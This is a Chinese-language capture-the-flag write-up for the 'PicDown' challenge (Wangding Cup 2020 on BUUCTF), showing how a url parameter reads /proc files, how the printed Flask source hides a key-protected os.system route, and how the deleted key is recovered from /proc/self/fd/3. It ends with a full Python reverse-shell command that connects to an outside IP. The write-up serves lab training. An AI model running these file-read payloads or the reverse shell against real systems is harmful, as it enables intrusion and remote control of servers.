[BUUCTF][网鼎杯 2020 白虎组]PicDown

考点

文件读取

反弹shell

解题

在输入框输入数字会在url后面添加参数,利用该参数来尝试文件读取

获取启动指定进程的完整命令

/proc/self/cmdline

获得

python2 app.py

那么我们再读一下这个文件

/proc/self/cwd/app.py

得到

from flask import Flask, Response
from flask import render_template
from flask import request
import os
import urllib

app = Flask(__name__)

SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)


@app.route('/')
def index():
    return render_template('search.html')


@app.route('/page')
def page():
    url = request.args.get("url")
    try:
        if not url.lower().startswith("file"):
            res = urllib.urlopen(url)
            value = res.read()
            response = Response(value, mimetype='application/octet-stream')
            response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg'
            return response
        else:
            value = "HACK ERROR!"
    except:
        value = "SOMETHING WRONG!"
    return render_template('search.html', res=value)


@app.route('/no_one_know_the_manager')
def manager():
    key = request.args.get("key")
    print(SECRET_KEY)
    if key == SECRET_KEY:
        shell = request.args.get("shell")
        os.system(shell)
        res = "ok"
    else:
        res = "Wrong Key!"

    return res


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080)

审计代码,/no_one_know_the_manager路由有shel,但需要秘钥,秘钥被删除了

这里用到:

/proc/self/fd/3

fd 是一个目录,里面包含着当前进程打开的每一个文件的文件描述符(file descriptor),这些文件描述符是指向实际文件的一个符号链接,即每个通过这个进程打开的文件都会显示在这里。这里3为爆破得出。

得到密钥之后再传入shell就可以了,这里用python直接反弹shell

?key=DtNeOnENUgrbN25b9TxRSTM5P6JjI89T/gnWh2nnHsQ=&shell=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.***.***.***",39543));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

对结果进行url全编码之后再传入,flag在根目录

image-20220117234059380

非预期

直接读取flag

[BUUCTF][网鼎杯 2020 白虎组]PicDown_第1张图片

你可能感兴趣的:(刷题记录,linux)